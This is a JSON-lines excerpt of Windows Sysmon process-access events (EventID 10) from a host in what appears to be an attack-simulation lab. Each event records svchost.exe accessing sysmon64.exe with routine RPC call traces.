{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1467,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1468,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1469,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1470,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1471,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1472,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1473,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1474,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.792\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.792","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
